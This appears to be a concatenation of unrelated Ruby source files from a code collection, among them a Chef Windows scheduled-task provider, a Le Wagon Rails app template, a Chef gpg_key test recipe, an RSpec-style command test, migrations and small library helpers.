converge_by("#{new_resource} task created") do
task = TaskScheduler.new
if new_resource.frequency == :none
task.new_work_item(new_resource.task_name, {}, { user: new_resource.user, password: new_resource.password, interactive: new_resource.interactive_enabled })
task.activate(new_resource.task_name)
else
task.new_work_item(new_resource.task_name, trigger, { user: new_resource.user, password: new_resource.password, interactive: new_resource.interactive_enabled })
end
task.application_name = new_resource.command
task.parameters = new_resource.command_arguments if new_resource.command_arguments
task.working_directory = new_resource.cwd if new_resource.cwd
task.configure_settings(config_settings)
task.configure_principals(principal_settings)
task.set_account_information(new_resource.user, new_resource.password, new_resource.interactive_enabled)
task.creator = new_resource.user
task.description = new_resource.description unless new_resource.description.nil?
task.activate(new_resource.task_name)
end
end
end
action :run do
if current_resource.exists
logger.trace "#{new_resource} task exists"
if current_resource.task.status == "running"
logger.info "#{new_resource} task is currently running, skipping run"
else
converge_by("run scheduled task #{new_resource}") do
current_resource.task.run
end
end
else
logger.warn "#{new_resource} task does not exist - nothing to do"
end
end
action :delete do
if current_resource.exists
logger.trace "#{new_resource} task exists"
converge_by("delete scheduled task #{new_resource}") do
ts = TaskScheduler.new
ts.delete(current_resource.task_name)
end
else
logger.warn "#{new_resource} task does not exist - nothing to do"
end
end
action :end do
if current_resource.exists
logger.trace "#{new_resource} task exists"
if current_resource.task.status != "running"
logger.trace "#{new_resource} is not running - nothing to do"
else
converge_by("#{new_resource} task ended") do
current_resource.task.stop
end
end
else
logger.warn "#{new_resource} task does not exist - nothing to do"
end
end
action :enable do
if current_resource.exists
logger.trace "#{new_resource} task exists"
if current_resource.task.status == "not scheduled"
converge_by("#{new_resource} task enabled") do
                # TODO: win32-taskscheduler currently has no method to handle this, so schtasks.exe is used here
run_schtasks "CHANGE", "ENABLE" => ""
end
else
logger.trace "#{new_resource} already enabled - nothing to do"
end
else
logger.fatal "#{new_resource} task does not exist - nothing to do"
raise Errno::ENOENT, "#{new_resource}: task does not exist, cannot enable"
end
end
action :disable do
if current_resource.exists
logger.info "#{new_resource} task exists"
if %w{ready running}.include?(current_resource.task.status)
converge_by("#{new_resource} task disabled") do
                # TODO: win32-taskscheduler has no method to disable a task, so disabling is currently done with schtasks.exe
run_schtasks "CHANGE", "DISABLE" => ""
end
else
logger.warn "#{new_resource} already disabled - nothing to do"
end
else
logger.warn "#{new_resource} task does not exist - nothing to do"
end
end
alias_method :action_change, :action_create
private
        # separates the command arguments from the :command property
def set_command_and_arguments
cmd, *args = Chef::Util::PathHelper.split_args(new_resource.command)
new_resource.command = cmd
new_resource.command_arguments = args.join(" ")
end
def set_start_day_and_time
new_resource.start_day = Time.now.strftime("%m/%d/%Y") unless new_resource.start_day
new_resource.start_time = Time.now.strftime("%H:%M") unless new_resource.start_time
end
def update_task(task)
converge_by("#{new_resource} task updated") do
task.set_account_information(new_resource.user, new_resource.password, new_resource.interactive_enabled)
task.application_name = new_resource.command if new_resource.command
task.parameters = new_resource.command_arguments if new_resource.command_arguments
task.working_directory = new_resource.cwd if new_resource.cwd
task.trigger = trigger unless new_resource.frequency == :none
task.configure_settings(config_settings)
task.creator = new_resource.user
task.description = new_resource.description unless new_resource.description.nil?
task.configure_principals(principal_settings)
end
end
def trigger
start_month, start_day, start_year = new_resource.start_day.to_s.split("/")
start_hour, start_minute = new_resource.start_time.to_s.split(":")
          # TODO: currently end_month, end_day and end_year need to be set to 0. If they are not set, win32-taskscheduler raises a nil-to-Integer conversion error.
trigger_hash = {
start_year: start_year.to_i,
start_month: start_month.to_i,
start_day: start_day.to_i,
start_hour: start_hour.to_i,
start_minute: start_minute.to_i,
end_month: 0,
end_day: 0,
end_year: 0,
trigger_type: trigger_type,
type: type,
random_minutes_interval: new_resource.random_delay,
}
if new_resource.frequency == :minute
trigger_hash[:minutes_interval] = new_resource.frequency_modifier
end
if new_resource.frequency == :hourly
minutes = convert_hours_in_minutes(new_resource.frequency_modifier.to_i)
trigger_hash[:minutes_interval] = minutes
end
if new_resource.minutes_interval
trigger_hash[:minutes_interval] = new_resource.minutes_interval
end
if new_resource.minutes_duration
trigger_hash[:minutes_duration] = new_resource.minutes_duration
end
if trigger_type == TaskScheduler::MONTHLYDOW && frequency_modifier_contains_last_week?(new_resource.frequency_modifier)
trigger_hash[:run_on_last_week_of_month] = true
else
trigger_hash[:run_on_last_week_of_month] = false
end
if trigger_type == TaskScheduler::MONTHLYDATE && day_includes_last_or_lastday?(new_resource.day)
trigger_hash[:run_on_last_day_of_month] = true
else
trigger_hash[:run_on_last_day_of_month] = false
end
trigger_hash
end
def frequency_modifier_contains_last_week?(frequency_modifier)
frequency_modifier = frequency_modifier.to_s.split(",")
frequency_modifier.map! { |value| value.strip.upcase }
frequency_modifier.include?("LAST")
end
def day_includes_last_or_lastday?(day)
day = day.to_s.split(",")
day.map! { |value| value.strip.upcase }
day.include?("LAST") || day.include?("LASTDAY")
end
def convert_hours_in_minutes(hours)
hours.to_i * 60 if hours
end
        # TODO: try to optimize this method
        # Known issue: start_day and start_time are not mandatory, so when a weekly frequency is updated without the user specifying start_day,
        # idempotency is lost: new_resource.start_day is nil, the day of week derived from it is nil, and it never matches the current task's value.
def task_needs_update?(task)
flag = false
if new_resource.frequency == :none
flag = (task.author != new_resource.user ||
task.application_name != new_resource.command ||
description_needs_update?(task) ||
task.parameters != new_resource.command_arguments.to_s ||
task.principals[:run_level] != run_level ||
task.settings[:disallow_start_if_on_batteries] != new_resource.disallow_start_if_on_batteries ||
task.settings[:stop_if_going_on_batteries] != new_resource.stop_if_going_on_batteries ||
task.settings[:start_when_available] != new_resource.start_when_available)
else
current_task_trigger = task.trigger(0)
new_task_trigger = trigger
flag = (ISO8601::Duration.new(task.idle_settings[:idle_duration])) != (ISO8601::Duration.new(new_resource.idle_time * 60)) if new_resource.frequency == :on_idle
flag = (ISO8601::Duration.new(task.execution_time_limit)) != (ISO8601::Duration.new(new_resource.execution_time_limit * 60)) unless new_resource.execution_time_limit.nil?
            # if no trigger is found, update the task to add the trigger
if current_task_trigger.nil?
flag = true
else
flag = true if start_day_updated?(current_task_trigger, new_task_trigger) == true ||
start_time_updated?(current_task_trigger, new_task_trigger) == true ||
current_task_trigger[:trigger_type] != new_task_trigger[:trigger_type] ||
current_task_trigger[:type] != new_task_trigger[:type] ||
current_task_trigger[:random_minutes_interval].to_i != new_task_trigger[:random_minutes_interval].to_i ||
current_task_trigger[:minutes_interval].to_i != new_task_trigger[:minutes_interval].to_i ||
task.author.to_s.casecmp(new_resource.user.to_s) != 0 ||
task.application_name != new_resource.command ||
description_needs_update?(task) ||
task.parameters != new_resource.command_arguments.to_s ||
task.working_directory != new_resource.cwd.to_s ||
task.principals[:logon_type] != logon_type ||
task.principals[:run_level] != run_level ||
PRIORITY[task.priority] != new_resource.priority ||
task.settings[:disallow_start_if_on_batteries] != new_resource.disallow_start_if_on_batteries ||
task.settings[:stop_if_going_on_batteries] != new_resource.stop_if_going_on_batteries ||
task.settings[:start_when_available] != new_resource.start_when_available
if trigger_type == TaskScheduler::MONTHLYDATE
flag = true if current_task_trigger[:run_on_last_day_of_month] != new_task_trigger[:run_on_last_day_of_month]
end
if trigger_type == TaskScheduler::MONTHLYDOW
flag = true if current_task_trigger[:run_on_last_week_of_month] != new_task_trigger[:run_on_last_week_of_month]
end
end
end
flag
end
def start_day_updated?(current_task_trigger, new_task_trigger)
( new_resource.start_day && (current_task_trigger[:start_year].to_i != new_task_trigger[:start_year] ||
current_task_trigger[:start_month].to_i != new_task_trigger[:start_month] ||
current_task_trigger[:start_day].to_i != new_task_trigger[:start_day]) )
end
def start_time_updated?(current_task_trigger, new_task_trigger)
( new_resource.start_time && ( current_task_trigger[:start_hour].to_i != new_task_trigger[:start_hour] ||
current_task_trigger[:start_minute].to_i != new_task_trigger[:start_minute] ) )
end
def trigger_type
case new_resource.frequency
when :once, :minute, :hourly
TaskScheduler::ONCE
when :daily
TaskScheduler::DAILY
when :weekly
TaskScheduler::WEEKLY
when :monthly
            # When frequency is :monthly, a numeric frequency_modifier of 1-12 maps to MONTHLYDATE; anything else maps to MONTHLYDOW
# Ref https://msdn.microsoft.com/en-us/library/windows/desktop/aa382061(v=vs.85).aspx
new_resource.frequency_modifier.to_i.between?(1, 12) ? TaskScheduler::MONTHLYDATE : TaskScheduler::MONTHLYDOW
when :on_idle
TaskScheduler::ON_IDLE
when :onstart
TaskScheduler::AT_SYSTEMSTART
when :on_logon
TaskScheduler::AT_LOGON
else
raise ArgumentError, "Please set frequency"
end
end
def type
case trigger_type
when TaskScheduler::ONCE
{ once: nil }
when TaskScheduler::DAILY
{ days_interval: new_resource.frequency_modifier.to_i }
when TaskScheduler::WEEKLY
{ weeks_interval: new_resource.frequency_modifier.to_i, days_of_week: days_of_week.to_i }
when TaskScheduler::MONTHLYDATE
{ months: months_of_year.to_i, days: days_of_month.to_i }
when TaskScheduler::MONTHLYDOW
{ months: months_of_year.to_i, days_of_week: days_of_week.to_i, weeks_of_month: weeks_of_month.to_i }
when TaskScheduler::ON_IDLE
# TODO: handle option for this trigger
when TaskScheduler::AT_LOGON
# TODO: handle option for this trigger
when TaskScheduler::AT_SYSTEMSTART
# TODO: handle option for this trigger
end
end
        # Delete "LAST" from the array of weeks of the month, since the last week is handled by the :run_on_last_week_of_month parameter.
def weeks_of_month
weeks_of_month = []
if new_resource.frequency_modifier
weeks = new_resource.frequency_modifier.split(",")
weeks.map! { |week| week.to_s.strip.upcase }
weeks.delete("LAST") if weeks.include?("LAST")
weeks_of_month = get_binary_values_from_constants(weeks, WEEKS_OF_MONTH)
end
weeks_of_month
end
# Deleting the "LAST" and "LASTDAY" from days since last day is handled in :run_on_last_day_of_month parameter.
def days_of_month
days_of_month = []
if new_resource.day
days = new_resource.day.to_s.split(",")
days.map! { |day| day.to_s.strip.upcase }
days.delete("LAST") if days.include?("LAST")
days.delete("LASTDAY") if days.include?("LASTDAY")
if days - (1..31).to_a
days.each do |day|
days_of_month << DAYS_OF_MONTH[day.to_i]
end
days_of_month = days_of_month.size > 1 ? days_of_month.inject(:|) : days_of_month[0]
end
else
days_of_month = DAYS_OF_MONTH[1]
end
days_of_month
end
def days_of_week
if new_resource.day
            # this line exists only for backward compatibility with the wildcard *
new_resource.day = "mon, tue, wed, thu, fri, sat, sun" if new_resource.day == "*" && new_resource.frequency == :weekly
days = new_resource.day.to_s.split(",")
days.map! { |day| day.to_s.strip.upcase }
weeks_days = get_binary_values_from_constants(days, DAYS_OF_WEEK)
else
            # the following condition keeps frequency :weekly idempotent when the user does not provide start_day, by reusing the current task's days_of_week
if (current_resource) && (current_resource.task) && (current_resource.task.trigger(0)[:type][:days_of_week]) && (new_resource.start_day.nil?)
weeks_days = current_resource.task.trigger(0)[:type][:days_of_week]
else
day = get_day(new_resource.start_day).to_sym if new_resource.start_day
DAYS_OF_WEEK[day]
end
end
end
def months_of_year
months_of_year = []
if new_resource.frequency_modifier.to_i.between?(1, 12) && !(new_resource.months)
new_resource.months = set_months(new_resource.frequency_modifier.to_i)
end
if new_resource.months
            # this line exists only for backward compatibility with the wildcard *
new_resource.months = "jan, feb, mar, apr, may, jun, jul, aug, sep, oct, nov, dec" if new_resource.months == "*" && new_resource.frequency == :monthly
months = new_resource.months.split(",")
months.map! { |month| month.to_s.strip.upcase }
months_of_year = get_binary_values_from_constants(months, MONTHS)
else
MONTHS.each do |key, value|
months_of_year << MONTHS[key]
end
months_of_year = months_of_year.inject(:|)
end
months_of_year
end
        # These values are used when frequency_modifier is set to 1-12.
        # This keeps backward compatibility; the values were validated against the earlier code and by running schtasks.exe.
        # Used this as reference https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks#d-dayday--
def set_months(frequency_modifier)
case frequency_modifier
when 1
"jan, feb, mar, apr, may, jun, jul, aug, sep, oct, nov, dec"
when 2
"feb, apr, jun, aug, oct, dec"
when 3
"mar, jun, sep, dec"
when 4
"apr, aug, dec"
when 5
"may, oct"
when 6
"jun, dec"
when 7
"jul"
when 8
"aug"
when 9
"sep"
when 10
"oct"
when 11
"nov"
when 12
"dec"
end
end
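        # ORs together the bit values looked up from the given constant hash.
        # Illustrative example (the values are not from the original source):
        #   get_binary_values_from_constants(%w{MON WED}, DAYS_OF_WEEK)
        #   # => TaskScheduler::MONDAY | TaskScheduler::WEDNESDAY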
def get_binary_values_from_constants(array_values, constant)
data = []
array_values.each do |value|
value = value.to_sym
data << constant[value]
end
data.size > 1 ? data.inject(:|) : data[0]
end
def run_level
case new_resource.run_level
when :highest
TaskScheduler::TASK_RUNLEVEL_HIGHEST
when :limited
TaskScheduler::TASK_RUNLEVEL_LUA
end
end
        # TODO: when creating the configuration settings, win32-taskscheduler accepts execution time limit values in ISO8601 format
def config_settings
settings = {
execution_time_limit: new_resource.execution_time_limit,
enabled: true,
}
settings[:idle_duration] = new_resource.idle_time if new_resource.idle_time
settings[:run_only_if_idle] = true if new_resource.idle_time
settings[:priority] = new_resource.priority
settings[:disallow_start_if_on_batteries] = new_resource.disallow_start_if_on_batteries
settings[:stop_if_going_on_batteries] = new_resource.stop_if_going_on_batteries
settings[:start_when_available] = new_resource.start_when_available
settings
end
def principal_settings
settings = {}
settings[:run_level] = run_level
settings[:logon_type] = logon_type
settings
end
def description_needs_update?(task)
task.description != new_resource.description unless new_resource.description.nil?
end
def logon_type
# Ref: https://msdn.microsoft.com/en-us/library/windows/desktop/aa383566(v=vs.85).aspx
          # if no logon_type is passed, TASK_LOGON_SERVICE_ACCOUNT is set as the default, so that value is used for comparison.
user_id = new_resource.user.to_s
password = new_resource.password.to_s
if Chef::ReservedNames::Win32::Security::SID.service_account_user?(user_id)
TaskScheduler::TASK_LOGON_SERVICE_ACCOUNT
elsif Chef::ReservedNames::Win32::Security::SID.group_user?(user_id)
TaskScheduler::TASK_LOGON_GROUP
elsif !user_id.empty? && !password.empty?
if new_resource.interactive_enabled
TaskScheduler::TASK_LOGON_INTERACTIVE_TOKEN
else
TaskScheduler::TASK_LOGON_PASSWORD
end
else
TaskScheduler::TASK_LOGON_INTERACTIVE_TOKEN
end
end
        # This method checks that the task and command properties exist, since both are mandatory to create a scheduled task.
def basic_validation
validate = []
validate << "Command" if new_resource.command.nil? || new_resource.command.empty?
validate << "Task Name" if new_resource.task_name.nil? || new_resource.task_name.empty?
return true if validate.empty?
raise Chef::Exceptions::ValidationFailed.new "Value for '#{validate.join(", ")}' option cannot be empty"
end
# rubocop:disable Style/StringLiteralsInInterpolation
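        # Illustrative call (the task name comes from the resource): run_schtasks("CHANGE", "ENABLE" => "")
        # shells out to something like: schtasks /CHANGE /TN "my_task" /ENABLE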
def run_schtasks(task_action, options = {})
cmd = "schtasks /#{task_action} /TN \"#{new_resource.task_name}\" "
options.each_key do |option|
unless option == "TR"
cmd += "/#{option} "
cmd += "\"#{options[option].to_s.gsub('"', "\\\"")}\" " unless options[option] == ""
end
end
          # Append the Task Run [TR] option last; appending it earlier can sometimes cause other options to be merged into the option["TR"] value
if options["TR"]
cmd += "/TR \"#{options["TR"]} \" " unless task_action == "DELETE"
end
logger.trace("running: ")
logger.trace(" #{cmd}")
shell_out!(cmd, returns: [0])
end
# rubocop:enable Style/StringLiteralsInInterpolation
def get_day(date)
Date.strptime(date, "%m/%d/%Y").strftime("%a").upcase
end
end
end
end
end
| 44.294953 | 185 | 0.619592 |
4a48a735b382382fb8073d0d5f10859743c1b26a | 8,035 | run "if uname | grep -q 'Darwin'; then pgrep spring | xargs kill -9; fi"
# GEMFILE
########################################
inject_into_file 'Gemfile', before: 'group :development, :test do' do
<<~RUBY
gem 'devise'
gem 'autoprefixer-rails', '10.2.5'
gem 'font-awesome-sass'
gem 'simple_form'
RUBY
end
inject_into_file 'Gemfile', after: 'group :development, :test do' do
<<-RUBY
gem 'pry-byebug'
gem 'pry-rails'
gem 'dotenv-rails'
RUBY
end
gsub_file('Gemfile', /# gem 'redis'/, "gem 'redis'")
# IRB conf file
########################################
irbrc = '
if defined?(Rails)
banner = ''
if Rails.env.production?
banner = "\e[41;97;1m prod \e[0m "
elsif Rails.env.staging?
banner = "\e[43;97;1m staging \e[0m "
end
IRB.conf[:PROMPT][:CUSTOM] = IRB.conf[:PROMPT][:DEFAULT].merge(
PROMPT_I: "#{banner}#{IRB.conf[:PROMPT][:DEFAULT][:PROMPT_I]}"
)
IRB.conf[:PROMPT_MODE] = :CUSTOM
end
'
file '.irbrc', irbrc.strip
# Clevercloud conf file
########################################
file 'clevercloud/ruby.json', <<~EOF
{
"deploy": {
"rakegoals": ["assets:precompile", "db:migrate"]
}
}
EOF
# Database conf file
########################################
db_production_conf = <<~EOF
production:
<<: *default
url: <%= ENV['POSTGRESQL_ADDON_URI'] %>
EOF
gsub_file('config/database.yml', /^production:.*\z/m, db_production_conf)
# Assets
########################################
run 'rm -rf app/assets/stylesheets'
run 'rm -rf vendor'
run 'curl -L https://github.com/lewagon/rails-stylesheets/archive/master.zip > stylesheets.zip'
run 'unzip stylesheets.zip -d app/assets && rm stylesheets.zip && mv app/assets/rails-stylesheets-master app/assets/stylesheets'
# Dev environment
########################################
gsub_file('config/environments/development.rb', /config\.assets\.debug.*/, 'config.assets.debug = false')
# Layout
########################################
if Rails.version < "6"
scripts = <<~HTML
<%= javascript_include_tag 'application', 'data-turbolinks-track': 'reload', defer: true %>
<%= javascript_pack_tag 'application', 'data-turbolinks-track': 'reload' %>
HTML
gsub_file('app/views/layouts/application.html.erb', "<%= javascript_include_tag 'application', 'data-turbolinks-track': 'reload' %>", scripts)
end
gsub_file('app/views/layouts/application.html.erb', "<%= javascript_pack_tag 'application', 'data-turbolinks-track': 'reload' %>", "<%= javascript_pack_tag 'application', 'data-turbolinks-track': 'reload', defer: true %>")
style = <<~HTML
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<%= stylesheet_link_tag 'application', media: 'all', 'data-turbolinks-track': 'reload' %>
HTML
gsub_file('app/views/layouts/application.html.erb', "<%= stylesheet_link_tag 'application', media: 'all', 'data-turbolinks-track': 'reload' %>", style)
# Flashes
########################################
file 'app/views/shared/_flashes.html.erb', <<~HTML
<% if notice %>
<div class="alert alert-info alert-dismissible fade show m-1" role="alert">
<%= notice %>
<button type="button" class="close" data-dismiss="alert" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<% end %>
<% if alert %>
<div class="alert alert-warning alert-dismissible fade show m-1" role="alert">
<%= alert %>
<button type="button" class="close" data-dismiss="alert" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<% end %>
HTML
run 'curl -L https://github.com/lewagon/awesome-navbars/raw/master/templates/_navbar_wagon.html.erb > app/views/shared/_navbar.html.erb'
inject_into_file 'app/views/layouts/application.html.erb', after: '<body>' do
<<-HTML
<%= render 'shared/navbar' %>
<%= render 'shared/flashes' %>
HTML
end
# README
########################################
markdown_file_content = <<~MARKDOWN
Rails app generated with [lewagon/rails-templates](https://github.com/lewagon/rails-templates), created by the [Le Wagon coding bootcamp](https://www.lewagon.com) team.
MARKDOWN
file 'README.md', markdown_file_content, force: true
# Generators
########################################
generators = <<~RUBY
config.generators do |generate|
generate.assets false
generate.helper false
generate.test_framework :test_unit, fixture: false
end
RUBY
environment generators
########################################
# AFTER BUNDLE
########################################
after_bundle do
# Generators: db + simple form + pages controller
########################################
rails_command 'db:drop db:create db:migrate'
generate('simple_form:install', '--bootstrap')
generate(:controller, 'pages', 'home', '--skip-routes', '--no-test-framework')
# Routes
########################################
route "root to: 'pages#home'"
# Git ignore
########################################
append_file '.gitignore', <<~TXT
# Ignore .env file containing credentials.
.env*
# Ignore Mac and Linux file system files
*.swp
.DS_Store
TXT
# Devise install + user
########################################
generate('devise:install')
generate('devise', 'User')
# App controller
########################################
run 'rm app/controllers/application_controller.rb'
file 'app/controllers/application_controller.rb', <<~RUBY
class ApplicationController < ActionController::Base
#{ "protect_from_forgery with: :exception\n" if Rails.version < "5.2"} before_action :authenticate_user!
end
RUBY
# migrate + devise views
########################################
rails_command 'db:migrate'
generate('devise:views')
# Pages Controller
########################################
run 'rm app/controllers/pages_controller.rb'
file 'app/controllers/pages_controller.rb', <<~RUBY
class PagesController < ApplicationController
skip_before_action :authenticate_user!, only: [ :home ]
def home
end
end
RUBY
# Environments
########################################
environment 'config.action_mailer.default_url_options = { host: "http://localhost:3000" }', env: 'development'
environment 'config.action_mailer.default_url_options = { host: "http://TODO_PUT_YOUR_DOMAIN_HERE" }', env: 'production'
# Webpacker / Yarn
########################################
run 'yarn add popper.js jquery [email protected]'
append_file 'app/javascript/packs/application.js', <<~JS
// ----------------------------------------------------
// Note(lewagon): ABOVE IS RAILS DEFAULT CONFIGURATION
// WRITE YOUR OWN JS STARTING FROM HERE 👇
// ----------------------------------------------------
// External imports
import "bootstrap";
// Internal imports, e.g:
// import { initSelect2 } from '../components/init_select2';
document.addEventListener('turbolinks:load', () => {
// Call your functions here, e.g:
// initSelect2();
});
JS
inject_into_file 'config/webpack/environment.js', before: 'module.exports' do
<<~JS
const webpack = require('webpack');
// Preventing Babel from transpiling NodeModules packages
environment.loaders.delete('nodeModules');
// Bootstrap 4 has a dependency over jQuery & Popper.js:
environment.plugins.prepend('Provide',
new webpack.ProvidePlugin({
$: 'jquery',
jQuery: 'jquery',
Popper: ['popper.js', 'default']
})
);
JS
end
# Dotenv
########################################
run 'touch .env'
# Rubocop
########################################
run 'curl -L https://raw.githubusercontent.com/lewagon/rails-templates/master/.rubocop.yml > .rubocop.yml'
# Git
########################################
git add: '.'
git commit: "-m 'Initial commit with devise template from https://github.com/lewagon/rails-templates'"
end
| 30.551331 | 222 | 0.581207 |
397cd210703e8ce4aa1cb121d1dbca4c63e45f32 | 1,701 | file '/tmp/dummy.key' do
content <<EOF
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v2.0.14 (GNU/Linux)
mQENBFr5hf8BCACzqYz7Hz0Bg1f9kba0PKTXSTEY7Tjq1HNJL36n5gURzq0487vo
ueqzRLI2LMqcnxBeHC1M4TSe+6BJHzAQZwe6n18zMVvOJCVm2ffJXc+cmKkxSYow
AmhkYCiN1gHVAZ54E+9TWPatbEnnggaa10h1hC6+nyQXED5pJrCahRjvxDjP+R5b
AgamvRsBFZG/48iHX9HdK8ytPx31fTpWKRd+2xYd0A7UOFjr1n7kD7j1vJDARvsk
P1jJKK/Nbp37cU2IzMavdE0mUi05lzE4n0HRZAquHT0mg/xRvB6cV6KRf0ekmV4A
W8hnbvdd2NcllPNhBvQnMXctpcymdEFxYoxrABEBAAG0UUNoZWYgR2VuZXJhdGVk
IERlZmF1bHQgKGR1bW15KSAoZ2VuZXJhdGVkIGJ5IENoZWYpIDxkZWZhdWx0LWNl
bnRvcy02QGV4YW1wbGUuY29tPokBOAQTAQIAIgUCWvmF/wIbLwYLCQgHAwIGFQgC
CQoLBBYCAwECHgECF4AACgkQlkcg/0cPTtukQAf/cRKkm+oFBj6iOJV5BF4eWDNq
SWl8NXgzOS+a8/WmNPat6yCtzIeLr8ihe2E7fSGFrtquPon7uJIknLVoKPR9nJn2
NbJIGX6a2mwdvO8aFYauHFovabz9IvQ20fGd/zVPWTiC0X+TPTap0oS039qpe7Jw
I4DnMK9ALc32Gc8QUDyISsPjhR6zRLcQd1opEA3ueHom9606ZMTGqJVsP8vNTefI
uu6FWzOd2gJUfkaM5affO2Sl/myb4OW5ZQWkmKEBoAgmAIw9mkiTJ936u5agBdG6
N6kKnBoIj8S5wCsG3s9TUOIHc4jXbwmwXgKh4d7f88gzBLB23xz2TVkqVczmHA==
=/FUl
-----END PGP PUBLIC KEY BLOCK-----
EOF
end
gpg_key 'import Dummy key to root keychain' do
user 'root'
name_real 'dummy'
key_file '/tmp/dummy.key'
action :import
not_if { ::File.exist?('/tmp/guard.txt') }
end
gpg_key 'delete public Dummy key' do
user 'root'
name_real 'dummy'
key_fingerprint '7877AF01696A73C4D02176F2964720FF470F4EDB'
action :delete_public_key
not_if { ::File.exist?('/tmp/guard.txt') }
end
# This set of actions (add then delete) will always trigger.
# For the purposes of testing we'll stick this file on disk
# so we know we've done it.
file '/tmp/guard.txt' do
content 'I am here to stop this resource from always firing'
end
| 36.191489 | 64 | 0.843034 |
79a61cff2c1eada4fb2bd7c29b30897181f0447c | 1,854 | require_relative '../../../../test_helper'
module Troo
module Commands
describe Show do
let(:described_class) { Show }
let(:klass) { stub(type: :resource_type) }
let(:id) {}
let(:type) { :card }
let(:id) { '1' }
let(:default) { false }
let(:resource) {}
let(:presenter) { stub }
before do
API::Client.stubs(:perform)
@card = Fabricate.build(:card, default: default)
klass.stubs(:retrieve).returns(resource)
Presenters::Card.stubs(:new).returns(presenter)
presenter.stubs(:show).returns(@card.name)
end
after { database_cleanup }
describe '.dispatch' do
subject { described_class.dispatch(klass, id) }
it { subject.must_be_instance_of(String) }
context 'when a resource ID is provided' do
context 'and the resource exists' do
let(:resource) { @card }
it 'presents the cards' do
subject.must_match(/#{@card.name}/)
end
end
context 'but the resource does not exist' do
it 'returns a polite message' do
subject.must_match(/cannot be found/)
end
end
end
context 'when a resource ID is not provided' do
let(:id) {}
context 'and a default resource is set' do
let(:default) { true }
let(:resource) { @card }
it 'presents the cards' do
subject.must_match(/#{@card.name}/)
end
end
context 'and a default resource is not set' do
it 'returns a polite message' do
subject.must_match(/to set a default/)
end
end
end
end
end
end
end
| 27.264706 | 58 | 0.516181 |
f75bd642e10957c9580a2c5a090ddf6aa12d53b4 | 209 | class CreateBookMarks < ActiveRecord::Migration
def change
create_table :book_marks do |t|
t.string :name
t.string :url
t.string :note
t.timestamps null: false
end
end
end
| 17.416667 | 47 | 0.650718 |
bf3ceeb039aeb604d08d5091fcb3f9dc8f671e78 | 682 | # frozen_string_literal: true
module Strings
module Fold
LINE_BREAK = "(\r\n+|\r+|\n+|\t+)".freeze
# Fold a multiline text into a single line string
#
# @example
# fold("\tfoo \r\n\n bar") # => "foo bar"
#
# @param [String] text
#
# @param [String] separator
# the separators to be removed from the text, default: (\r\n+|\r+|\n+|\t+)
#
# @return [String]
#
# @api public
def fold(text, separator = LINE_BREAK)
text.gsub(/([ ]+)#{separator}/, "\\1")
.gsub(/#{separator}(?<space>[ ]+)/, "\\k<space>")
.gsub(/#{separator}/, ' ')
end
module_function :fold
end # Fold
end # Strings
| 24.357143 | 80 | 0.530792 |
f72e3e9454d613331a5afd38765e6a1883398adc | 1,712 | # Copyright © 2020 MUSC Foundation for Research Development~
# All rights reserved.~
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:~
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.~
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following~
# disclaimer in the documentation and/or other materials provided with the distribution.~
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products~
# derived from this software without specific prior written permission.~
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,~
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT~
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL~
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS~
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR~
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.~
class RemoveForeignKeyUsers < ActiveRecord::Migration[5.1]
def change
remove_reference(:research_masters, :user, index: true, foreign_key: true)
end
end
| 65.846154 | 146 | 0.794393 |
1afb151bcba03d80d9241a451ec46da2d3a24116 | 1,367 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Compute::Mgmt::V2018_06_01
module Models
#
# Describes the parameters of ephemeral disk settings that can be specified
# for operating system disk. <br><br> NOTE: The ephemeral disk settings can
# only be specified for managed disk.
#
class DiffDiskSettings
include MsRestAzure
# @return [DiffDiskOptions] Specifies the ephemeral disk settings for
# operating system disk. Possible values include: 'Local'
attr_accessor :option
#
# Mapper for DiffDiskSettings class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'DiffDiskSettings',
type: {
name: 'Composite',
class_name: 'DiffDiskSettings',
model_properties: {
option: {
client_side_validation: true,
required: false,
serialized_name: 'option',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 27.34 | 79 | 0.58376 |
e96decb27f4457cae4ee2d317e2cda6aa78f50aa | 725 | MRuby.each_target do
current_dir = File.dirname(__FILE__)
relative_from_root = File.dirname(__FILE__).relative_path_from(MRUBY_ROOT)
current_build_dir = "#{build_dir}/#{relative_from_root}"
self.libmruby_objs << objfile("#{current_build_dir}/mrblib")
file objfile("#{current_build_dir}/mrblib") => "#{current_build_dir}/mrblib.c"
file "#{current_build_dir}/mrblib.c" => [mrbcfile, __FILE__] + Dir.glob("#{current_dir}/*.rb").sort do |t|
_, _, *rbfiles = t.prerequisites
FileUtils.mkdir_p File.dirname(t.name)
open(t.name, 'w') do |f|
_pp "GEN", "*.rb", "#{t.name.relative_path}"
f.puts File.read("#{current_dir}/init_mrblib.c")
